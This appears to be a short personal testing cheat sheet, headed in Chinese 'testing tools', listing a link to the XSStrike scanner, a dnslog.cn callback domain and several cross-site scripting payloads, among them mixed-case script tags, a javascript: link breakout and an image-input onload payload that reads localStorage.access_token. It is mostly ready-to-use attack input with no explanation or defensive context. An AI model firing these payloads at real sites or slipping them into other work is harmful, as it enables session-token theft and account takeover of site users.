测试工具

https://github.com/s0md3v/XSStrike

http://vvlawj.dnslog.cn

1
2
3
4
5
6
7
<ScRipt>alert(1)</ScRipt>
"><a href="javascript:alert(0)

$$ \<input type=image src=/static/css/img/logo.23d7be3.svg onload=alert(localStorage.access_token)> $$

<script>alert(1);</script>